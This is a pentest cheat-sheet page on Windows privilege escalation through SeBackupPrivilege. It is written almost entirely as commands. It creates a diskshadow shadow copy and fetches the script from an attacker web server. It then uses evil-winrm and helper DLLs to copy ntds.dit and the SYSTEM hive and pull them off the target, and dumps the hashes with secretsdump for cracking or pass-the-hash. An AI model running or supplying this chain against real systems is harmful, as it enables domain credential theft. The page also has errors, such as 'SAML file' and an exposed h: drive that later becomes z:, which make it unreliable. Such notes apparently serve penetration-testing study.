Exploit Notes

Windows PrivEsc with SeBackupPrivilege

Last modified: 2023-02-08

Privilege Escalation Windows

SeBackupPrivilege allows users to retrieve file contents.

Investigation

First check if the current user has SeBackupPrivilege in the privilege information.

whoami /all

If so, we can read any file on the system includes SAML file, SYSTEM registry file.


Exploitation

1. Create a Payload

Create “diskshadow.txt” in local machine. It referes to this.

set metadata C:\tmp\tmp.cabs 
set context persistent nowriters 
add volume c: alias someAlias 
create 
expose %someAlias% h:

Then transfer the file into the target machine.

Before that, create “tmp” folder in root in target machine.

mkdir \tmp
cd \tmp

For example, in target machine,

# [Option 1] PowerShell (we need to start web server in local machine)
PS> Invoke-WebRequest -Uri http://10.0.0.1:8000/diskshadow.txt -OutFile .\diskshadow.txt

# [Option 2] In evil-winrm
PS> upload diskshadow.txt

2. Execute DiskShadow.Exe

Then execute diskshadow.exe.

# /s: Specify the script file
diskshadow.exe /s .\diskshadow.txt

3. Upload Malicious DLL

We can download two dll files from here.

# In evil-winrm
PS> upload SeBackupPrivilegeUtils.dll
PS> upload SeBackupPrivilegeCmdLets.dll
PS> Import-Module .\SeBackupPrivilegeUtils.dll
PS> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS> Copy-FileSeBackupPrivilege z:\windows\ntds\ntds.dit c:\tmp\ntds.dit -overwrite
PS> reg save HKLM\SYSTEM c:\tmp\system
PS> download ntds.dit
PS> download system

4. Dump Password Hashes

Now we have two files (ntds.dit and system) in local machine.
We can dump password hashes using the files.

impacket-secretsdump -ntds ntds.dit -system system LOCAL

After that, crack the hashes or use them for pass-the-hash.

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.